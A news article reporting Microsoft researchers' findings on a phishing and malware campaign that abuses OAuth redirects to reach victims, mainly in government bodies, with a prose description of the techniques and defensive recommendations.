Cybersecurity experts have warned that a new phishing and malware distribution campaign is exploiting the OAuth redirection mechanism used in online identity authentication systems. According to the report, attackers are generating traffic that appears similar to legitimate authentication processes and redirecting users to suspicious websites. This technique is mainly being used to target government institutions and public-sector organizations.
How Attackers Abuse OAuth for Phishing
Microsoft security researchers stated that cybercriminals are sending phishing links disguised as social security notifications, e-signature requests, meeting invitations, and password reset alerts. In several cases, these links are also hidden inside PDF files to evade standard security scanning systems.
Experts explained that attackers are abusing the legitimate behavior of the OAuth 2.0 protocol. Cybercriminals register malicious OAuth applications in a tenant under their control and configure the redirect URI to point to their own infrastructure. When a user initiates the login process, authentication error parameters force the system to redirect the victim to the attacker’s server.
FCRF Launches Flagship Certified Fraud Investigator (CFI) Program
Bypassing MFA with Man-in-the-Middle Redirects
The report also revealed that in some campaigns, victims were redirected to man-in-the-middle phishing frameworks designed to steal session cookies and bypass multi-factor authentication (MFA) security. This could potentially compromise valid user login credentials.
Cybersecurity researchers also found that attackers misuse the ‘state’ parameter to pre-fill the victim’s email address in the phishing page’s credential box. This creates the illusion that the user is logging into an official portal, while in reality, they are interacting with a fake page.
Malware Delivery via ZIP Files and DLL Side-Loading
Another attack method involves redirecting users to a download path where malware is delivered in ZIP file format. The package contains Windows shortcut (.LNK) files and HTML smuggling tools. When the victim opens the LNK file, a PowerShell script is triggered, beginning the collection of basic system information.
Experts further explained that DLL side-loading techniques are used in the later stage of the attack. In this method, a malicious DLL file decrypts and loads malware into system memory while a legitimate-looking application runs in the background to avoid suspicion.
Microsoft Recommendations and Expert Warnings
According to the research report, cybercriminals are triggering error-based redirects by using incorrect OAuth parameters such as scope or prompt=none. This technique is increasingly being observed in real-world phishing campaigns.
The company has advised organizations to restrict OAuth application permissions and implement strong identity protection policies. It also recommends the use of Conditional Access systems and cross-domain monitoring technologies.
Security experts say such attacks mainly belong to identity-based threat categories, where attackers exploit the intended behavior of system protocols. Threat actors intentionally generate error flows to trap users.
The report warns that cybercriminals are continuously adopting new techniques, so both organizations and individual users must remain vigilant. Users are advised to avoid suspicious links, unknown download files, and unauthorized authentication requests.
About the author – Ayesha Aayat is a law student and contributor covering cybercrime, online frauds, and digital safety concerns. Her writing aims to raise awareness about evolving cyber threats and legal responses.
